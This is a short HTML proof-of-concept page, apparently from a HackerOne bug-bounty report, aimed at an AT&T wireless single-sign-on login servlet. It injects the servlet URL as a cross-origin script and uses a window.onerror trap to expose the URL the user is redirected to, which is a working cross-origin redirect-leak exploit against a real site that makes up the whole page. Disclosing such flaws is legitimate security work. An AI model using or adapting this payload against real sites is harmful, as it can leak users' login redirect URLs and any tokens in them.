<!DOCTYPE html>
<html >
<head>
	<title>POC</title>

</head>
<body>
<script > 
var destinationPage = 'https://www.wireless.att.com/b2bservlets/HaloBPremierSSOLoginServlet.dyn?REFERRER='; 

 window.onerror=fnErrorTrap; 
 function fnErrorTrap(sMsg,sUrl,sLine){
     alert('Source address was: ' + destinationPage + '\n\nDestination URL is: ' + sUrl + '\n\nBy vaib25vicky hackerone');
     return false; 
   } 

   document.write('<script src="'+destinationPage+'" async><\/script>');
    </script>
</body>
</html>